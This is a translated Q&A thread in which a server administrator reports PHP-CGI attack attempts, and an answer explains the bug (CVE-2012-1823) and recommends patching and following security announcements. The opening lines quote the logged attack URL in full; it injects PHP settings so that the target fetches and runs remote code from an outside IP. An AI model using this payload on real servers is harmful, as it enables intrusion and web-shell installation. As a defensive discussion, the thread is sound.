我今天收到了来自不同 IP 的大量漏洞攻击尝试。
获取/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
info3.txt的内容为:
Google 显示过去几天有很多人在谈论这个问题,但没有真正的解决方案或解释这是什么。这里有一篇文章: http://huguesjohnson.com/programming/hacking-attempt/
“我想暂时就到此为止了。我不知道这个网站是否是犯罪团伙的一部分,但既然它可以访问僵尸网络,我假设它是。81.17.24.82 IP 没有出现在任何恶意软件分发者的位置,这很奇怪。也许这是一个最近被入侵的网络服务器,或者是组织这次攻击的人最近获取的 IP 地址。”
我的问题是:在这种情况下,下一步该怎么做?管理员应该遵循哪些最佳实践来通知安全人员?您会关注哪些网站来掌握此类情况并应用适当的保护措施(例如 mod_security)?
答案1
很明显,他们试图利用最近在 PHP 配置为 CGI 时发现的漏洞(CVE-2012-1823)。
他们最终想要达到什么目的,我们只能猜测,直到我们听到真正被攻陷并随后分析服务器的人的消息。
从目前的情况来看,他们试图在这些服务器上运行 C99 shell。我们目前还不能将其与僵尸网络招募或任何其他目的联系起来。
作为管理员,您当然应该检查自己是否不容易受到这种攻击。
在本例中,就是验证您部署了 PHP >=5.3.12。
您可以尝试联系发起攻击的 IP 和托管 info3.txt 的 IP 所有者的滥用团队。但该提供商可能不会对您的主张印象深刻。
通知安全人员?
不,我不会,这是在试图利用一个已知的漏洞。
我发现订阅我向互联网公开的软件和我们的基础操作系统的安全和/或公告邮件列表很有用。
这样,我就能快速收到有关我真正关心的安全问题和新版本的通知。